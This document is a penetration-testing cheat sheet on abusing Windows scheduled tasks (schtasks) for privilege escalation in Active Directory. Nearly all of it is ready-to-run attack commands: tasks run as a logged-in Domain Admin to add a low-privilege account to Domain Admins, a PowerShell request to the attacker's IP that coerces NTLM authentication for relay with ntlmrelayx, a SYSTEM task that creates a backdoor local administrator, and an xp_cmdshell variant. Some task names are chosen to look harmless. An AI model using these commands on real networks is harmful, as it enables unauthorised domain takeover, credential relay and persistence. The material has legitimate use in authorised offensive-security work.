# schtasks
Can be used for privesc LOL!  [This article](https://steflan-security.com/windows-privilege-escalation-scheduled-tasks/) covers it pretty well.

## Queue up a scheduled net.exe privesc task by abusing a DA who is logged in interactively
Check who's logged in (and look for a DA):
```
Get-Process -IncludeUserName explorer | Select-Object UserName
```

Queue up the task:

```
schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
```

!!!tip
Depending on the Windows system, sometimes you have to reverse the use of single ticks and quotes above, so, for example:
```
schtasks /create /tn "TotallyFineTask" /tr "net group 'Domain Admins' lowpriv /add /domain" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
```
!!!

Run it:
```
schtasks /run /tn "TotallyFineTask"
```

## Queue up a scheduled HTTP-based privesc task by abusing a DA who is logged in interactively
This is handy when you want to coerce a logged-in DA to do an HTTP call to your attacking box so you can relay to LDAP with ntlmrelayx:

```
schtasks /create /tn "TotallyFineNotSus" /tr "powershell.exe IWR http://your-kali-ip -UseDefaultCredentials" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
```

In another window have something like this going:

```
ntlmrelayx -t ldap://ip.of.a.domaincontroller -debug --escalate-user lowpriv
```

Then fire the schtask!
```
schtasks /run /tn "TotallyFineNotSus"
```

## Queue up a scheduled task when you have NT AUTHORITY\SYSTEM privileges
Sometimes you might get on a box with `NT AUTHORITY\SYSTEM` permissions and have problems running `net.exe` to create a back door local admin or add a domain user to a local admin group.  In cases like these you can use the scheduled task trick, but this time set the `/ru` to be `SYSTEM` like so:

```
schtasks /create /tn "TotallyFineMaintenanceNotABigDeal" /tr "net localgroup administrators SuperSecretLocalAdmin /add" /sc once /st 12:00 /ru SYSTEM /f
```

:::tip
Sometimes escaping single ticks and quotes is hard in xp_cmdshell, so here's another example that works for group shenanigans:
```
EXEC xp_cmdshell 'schtasks /create /tn "DBMaint" /tr "net group \"Domain Admins\" lowpriv /add /domain" /sc once /st 12:00 /ru "domain\a-domain-admin" /it /f';
```
:::

## Get details on when the task last ran
Tells you when it last ran, error codes, etc:
```
schtasks /query /tn "Sometask" /v /fo LIST
```

## Find all tasks that start with certain characters
For example, if you queued up a bunch of tasks that started with *DB* you could list them with:

```
EXEC xp_cmdshell 'schtasks /query | findstr /i "DB"';
```

## Delete a scheduled task
```
schtasks /delete /TN "MyTaskName" /F
```